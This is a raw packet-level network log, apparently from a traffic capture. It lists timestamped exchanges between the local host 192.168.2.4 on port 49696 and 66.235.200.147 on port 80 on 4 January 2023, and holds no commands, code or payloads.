Jan 4, 2023 16:47:45.307415962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307425976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307440042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307447910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307471991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307471991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307497978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307502031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307522058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307524920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307543993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307548046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307566881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307569981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307593107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307594061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307614088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307616949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307636976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307638884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307657957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307662964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307679892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307687998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307710886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307713032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307733059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307735920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307759047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307766914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307787895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307796001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307801962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307816029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307816029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307831049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307840109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307852983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307864904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307885885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307895899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307915926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307920933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307939053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307943106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307967901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307969093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307980061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307996988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308007002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308011055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308032036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308037996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308047056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308053017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308072090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308093071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308096886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308115959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308123112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308147907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308149099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308171034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308180094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308196068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308202028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308221102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308223963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308244944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308245897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308268070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308269024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308289051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308294058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308315992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308319092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308341980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308343887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308368921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308368921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308387995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308394909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308412075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308418989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308432102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308445930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308460951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308470964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308482885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308494091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308511972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308517933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308541059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308542967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308564901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308568001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308583975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308603048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308625937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308638096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308646917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308670998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308671951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308693886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308696032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308712006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308733940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308734894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308760881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308763981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308784008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308798075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308810949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308830023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308835030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308856964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308860064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308881044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308881998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308902979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308903933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308924913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308926105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308950901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308954000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308970928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308973074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.308990955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.308998108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309011936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309032917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309041023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309056044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309081078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309082985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309111118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309112072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309130907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309134007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309158087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309158087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309174061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309182882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309195042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309209108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309223890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309231997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309243917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309256077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309274912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309287071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309295893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309318066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309340954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309359074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309365034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309395075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309397936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309422970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309422970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309446096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309447050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309469938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309470892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309494972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309497118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309516907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309520960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309537888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309547901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309559107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309575081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309588909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309597969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309621096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309638977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309638977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309642076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309659958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309668064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309680939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309688091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309708118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309710026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309727907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309731007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309746027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309751034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309772968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309792995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309798956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309818983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309824944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309839010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309854984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309856892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309878111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309890032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309900999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309921026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309921980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309943914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309947014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309959888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.309964895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309986115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.309987068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310004950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310019016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310034990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310039043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310055017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310070992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310079098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310101032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310101986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310123920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310125113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310144901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310148954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310165882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310169935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310185909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310189962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310205936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310213089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310226917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310247898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310255051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310275078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310276031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310300112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310307980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310321093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310339928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310344934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310359001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310378075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310384989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310400009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310405016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310426950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310427904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310446978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310450077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310467005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310471058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310487032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310492992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310507059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310512066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310529947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310535908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310554028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310556889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310574055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310580969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310595036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310604095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310615063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310625076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310635090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310646057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310655117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310667992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310674906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310703993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310704947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310719013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310726881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310745955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310750008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310765982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310781956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310791016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310800076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310816050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310820103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310839891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310844898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310859919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310878992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310882092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310899973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310904980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310920954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310936928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310940981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310961008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.310969114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.310981035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311000109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311002016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311018944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311033010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311038971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311058998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311063051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311079025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311096907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311100960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311116934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311124086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311136961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311156034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311157942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311176062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311187983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311196089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311214924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311218977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311235905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311254978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311259031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311274052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311276913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311294079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311309099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311312914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311331987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311335087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311355114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311363935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311374903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311393976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311397076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311414003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311427116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311434031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311454058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311458111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311472893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311491013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311491966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311512947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311515093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311532021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311546087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.311553001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.311574936 CET	49696	80	192.168.2.4	66.235.200.147
